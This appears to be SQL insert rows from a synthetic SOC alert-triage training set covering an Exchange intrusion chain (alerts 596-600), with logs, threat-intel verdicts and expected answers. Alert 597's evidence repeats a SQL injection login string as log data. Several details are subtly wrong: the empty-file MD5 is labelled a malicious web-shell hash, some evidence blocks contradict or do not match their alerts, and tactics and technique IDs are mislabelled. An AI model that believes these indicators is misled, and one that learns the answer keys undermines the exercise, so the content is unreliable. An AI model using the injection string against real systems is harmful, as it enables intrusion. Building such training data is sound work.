(596, 'Suspicious Access to Exchange Server', 'high', 'Exchange Server logs', 'Initial access attempt detected on the Exchange server via CVE-2021-34473 exploitation. An unauthorized request was made from a suspicious external IP address, potentially setting the stage for further attacks.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:03:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.5\",\"destination_port\":\"443\",\"username\":\"unauthorized_user\",\"action\":\"login_attempt\",\"status\":\"failed\",\"exploit\":\"CVE-2021-34473\",\"file_accessed\":\"/owa/auth.owa\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT groups targeting Exchange servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Exchange Server\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in the directory.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/owa/auth.owa\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File frequently targeted in Exchange exploits.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(597, 'Web Shell Deployment Detected', 'high', 'Web server logs', 'A web shell has been deployed on the server, allowing remote execution of commands by attackers. This indicates a severe security breach that needs immediate attention.', 'Execution', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"method\":\"POST\",\"url\":\"/uploads/webshell.php\",\"http_status\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uploaded_file\":{\"filename\":\"webshell.php\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"username\":\"admin_user\",\"session_id\":\"abcd1234efgh5678ijkl\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"webshell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident Response Team\",\"verdict\":\"malicious\",\"details\":\"File identified as web shell\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with known web shells\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used for unauthorized 
access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event 
count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(598, 'Privilege Escalation via CVE-2021-34523', 'high', 'Event logs and security logs', 'An attacker exploited CVE-2021-34523 to escalate privileges on the server, potentially allowing persistent access. The attacker used a crafted exploit to gain elevated privileges, moving from a standard user account to an administrative account. This action solidifies their foothold within the network, facilitating further malicious activities.', 'Persistence', 'T1068: Exploitation for Privilege Escalation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":4624,\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"event_type\":\"Logon\",\"user\":{\"target_user\":\"admin_user\",\"target_domain\":\"CORP\",\"target_logon_id\":\"0x3e7\"},\"logon_type\":2,\"logon_process\":\"User32 \",\"authentication_package\":\"Negotiate\",\"source_ip\":\"203.0.113.45\",\"source_port\":60000,\"target_ip\":\"10.0.0.25\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"vulnerability_exploited\":\"CVE-2021-34523\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Hash observed in suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal 
Audit\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 
\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 
\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(599, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'The attackers are moving laterally through the network, using compromised credentials and exploiting trust relationships to access additional systems.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"LM-0456\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"attacker_ip\":\"203.0.113.45\",\"compromised_user\":\"jdoe\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"network.exe\",\"protocol\":\"HTTP\",\"action\":\"Successful Login\",\"description\":\"User jdoe from IP 192.168.1.25 accessed 192.168.1.50 using compromised credentials. Network traffic analysis reveals communication with external IP 203.0.113.45 and transfer of suspicious file network.exe with hash 5d41402abc4b2a76b9719d911017c592.\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common internal IP used by workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP of target workstation within internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized access 
attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"network.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as malware used for spreading within the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(600, 'Data Exfiltration via Unusual Channels', 'high', 'Data loss prevention logs', 'Sensitive data was exfiltrated using encrypted channels, indicating a potential ransom demand or further exploitation. The data was sent to an external IP known for malicious activities. The file \'customer_data_backup.zip\' was detected leaving the network from an internal host using unusual ports.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.54\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"customer_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"event\":\"data_exfiltration_attempt\",\"encryption\":\"TLS\",\"alert_id\":\"EXFIL-12345\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host used for data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"customer_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention System\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
